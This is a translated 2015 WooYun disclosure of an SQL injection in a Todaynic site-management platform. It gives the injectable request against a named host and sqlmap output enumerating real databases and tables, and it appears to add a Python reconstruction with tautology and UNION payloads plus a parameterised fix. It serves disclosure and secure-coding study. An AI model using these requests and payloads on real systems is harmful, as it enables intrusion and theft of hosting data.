Vulnerability summary

Defect ID: wooyun-2015-0132364

Title: SQL injection in a Todaynic (时代互联) management platform leads to the compromise of nearly a thousand websites

Vendor: Guangdong Todaynic Technology Co., Ltd. (广东时代互联科技有限公司)

Author: 孤风

Submitted: 2015-08-07 14:12

Fixed: 2015-09-21 18:04

Published: 2015-09-21 18:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-08-07: Details sent to the vendor, awaiting vendor action
2015-08-07: Vendor confirmed; details visible to the vendor only
2015-08-17: Details disclosed to core white hats and domain experts
2015-08-27: Details disclosed to regular white hats
2015-09-06: Details disclosed to intern white hats
2015-09-21: Details disclosed to the public

Brief description:

Waiting to be ignored; while I'm here, can anyone tell me how to get a shell from a backend on linux+php+apache?

Detailed description:

Injection point (the `id` POST parameter; `*` is sqlmap's injection-marker syntax, and `submit=%e6%8f%90%e4%ba%a4` is the URL-encoded form of 提交, "Submit")

POST /admin.php/website/check HTTP/1.1
Content-Length: 328
Content-Type: application/x-www-form-urlencoded
Host: a.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
submit=%e6%8f%90%e4%ba%a4&bind_status=3&id=*
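The report does not show the server-side code behind `/admin.php/website/check`, only that the `id` parameter is injectable. The following is an added example, not code from the report or from Todaynic, that reconstructs the likely shape of the bug in Python on an in-memory SQLite database: a handler that interpolates `id` straight into the query beside a parameterised one, plus the true/false tautology probe that sqlmap's boolean-based detection is built on. The `wp_website` and `wp_admin` table names come from the report's `webphone_center` listing; their columns, the sample rows and the `password_hash` value are constructed assumptions. SQLite uses `||` where MySQL would use `CONCAT()`, and the real application is PHP, so this models the logic, not the vendor's code.

```python
import sqlite3

# Constructed sample data: table names from the report, columns and rows are assumptions.
SAMPLE_SITES = [
    (1, "a.example", 3),
    (2, "b.example", 3),
    (3, "c.example", 0),
]


def make_db():
    """Build an in-memory stand-in for the webphone_center database."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE wp_website (id INTEGER PRIMARY KEY, domain TEXT, bind_status INTEGER)")
    cur.execute("CREATE TABLE wp_admin (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    cur.executemany("INSERT INTO wp_website VALUES (?, ?, ?)", SAMPLE_SITES)
    cur.execute("INSERT INTO wp_admin VALUES (1, 'admin', 'constructed-hash')")  # constructed value
    conn.commit()
    return conn


def check_vulnerable(conn, id_param, bind_status):
    """Hypothetical reconstruction of the vulnerable handler: `id` is concatenated
    into the SQL text, so anything after the number becomes part of the query."""
    sql = (
        "SELECT id, domain FROM wp_website "
        f"WHERE bind_status = {int(bind_status)} AND id = {id_param}"
    )
    return conn.execute(sql).fetchall()


def check_fixed(conn, id_param, bind_status):
    """Hardened form: reject anything that is not an integer, then bind both
    values as parameters so the driver never treats them as SQL."""
    try:
        id_int = int(id_param)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    sql = "SELECT id, domain FROM wp_website WHERE bind_status = ? AND id = ?"
    return conn.execute(sql, (int(bind_status), id_int)).fetchall()


def boolean_probe(handler, conn, base_id="1", bind_status=3):
    """Minimal boolean-based blind check, the idea behind sqlmap's `id=*` marker:
    send a TRUE and a FALSE tautology and report whether the responses differ.
    A handler that rejects or neutralises the payload answers both the same way."""
    def run(payload):
        try:
            return handler(conn, payload, bind_status)
        except ValueError:
            return "rejected"

    true_resp = run(f"{base_id} AND 1=1")
    false_resp = run(f"{base_id} AND 1=2")
    return true_resp != false_resp


if __name__ == "__main__":
    db = make_db()
    print("normal request  :", check_vulnerable(db, "1", 3))
    print("OR 1=1 dumps all:", check_vulnerable(db, "1 OR 1=1", 3))
    print("UNION reads wp_admin:",
          check_vulnerable(db, "0 UNION SELECT id, username || ':' || password_hash FROM wp_admin", 3))
    print("vulnerable handler injectable?", boolean_probe(check_vulnerable, db))
    print("fixed handler injectable?     ", boolean_probe(check_fixed, db))
```

For a numeric column a plain integer cast is already sufficient; parameterised queries are the general fix and also cover string parameters such as `bind_status` if it is ever not an integer.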


Databases

available databases [11]:
[*] #mysql50#lost+found
[*] #mysql50#webphone.bak20150806
[*] db_now_net_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] proftpd
[*] test
[*] webphone
[*] webphone_bak
[*] webphone_center


Database: db_now_net_cn
[16 tables]
+----------------+
| APIControl |
| Albums |
| ApacheLog |
| ApacheLog_more |
| JTomcat |
| Options |
| Photos |
| Security |
| VDNS |
| VDNSI |
| VHostLog |
| VHostReferring |
| VHostServer |
| VHostServer_M |
| VHostSub |
| VHostSub_M |
+----------------+


Website information

Database: db_now_net_cn
Table: APIControl
[13 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| APIContact | varchar(30) |
| APIHost | varchar(60) |
| APILogin | varchar(30) |
| APIName | varchar(50) |
| APIPassword | varchar(33) |
| APIPort | varchar(6) |
| chrEmail | varchar(30) |
| chrTel | varchar(30) |
| cltrid | int(11) |
| dtUpdate | datetime |
| IDAPI | int(11) |
| intActive | tinyint(4) |
| intMoney | int(11) |
+-------------+-------------+


907 websites

Database: webphone_center
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| wp_admin_log | 2897 |
| wp_website | 907 |
| wp_themes | 26 |
| wp_themes_category | 11 |
| wp_admin | 1 |
+--------------------+---------+


There is also a database with 7036 tables; I couldn't be bothered to dump it.

web application technology: PHP 5.5.18, Apache 2.4.10
back-end DBMS: MySQL 5.0
[22:47:36] [WARNING] missing table parameter, sqlmap will retrieve the number of
entries for all database management system databases' tables
[22:47:36] [INFO] fetching tables for database: 'webphone_bak'
[22:47:36] [INFO] the SQL query used returns 7036 entries
[22:47:37] [WARNING] reflective value(s) found and filtering out
[22:47:37] [INFO] retrieved: np_002_hr_category
[22:47:37] [INFO] retrieved: np_200_hr_category
[22:47:37] [INFO] retrieved: np_200_hr_company
[22:47:38] [INFO] retrieved: np_200_hr_job
[22:47:38] [INFO] retrieved: np_200_hr_list
[22:47:38] [INFO] retrieved: np_200_link
[22:47:39] [INFO] retrieved: np_200_nav
[22:47:39] [INFO] retrieved: np_200_page
[22:47:39] [INFO] retrieved: np_200_product
[22:47:40] [INFO] retrieved: np_200_product_category
[22:47:40] [INFO] retrieved: np_200_show
[22:47:40] [INFO] retrieved: np_2013_admin
[22:47:41] [INFO] retrieved: np_2013_admin_log
[22:47:41] [INFO] retrieved: np_2013_article

Proof of vulnerability:

Logged in.
Server configuration

[Image: QQ图片20150806235215.png]


Website information

[Image: QQ图片20150806235256.png]


The privileges are very broad: sites can be shut down or deleted directly.

[Image: QQ图片20150806235321.png]


Fix recommendation:

23333 (Chinese internet shorthand for laughing)

Copyright notice: credit 孤风@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-08-07 18:02

Vendor reply:

Thanks

Latest status:

None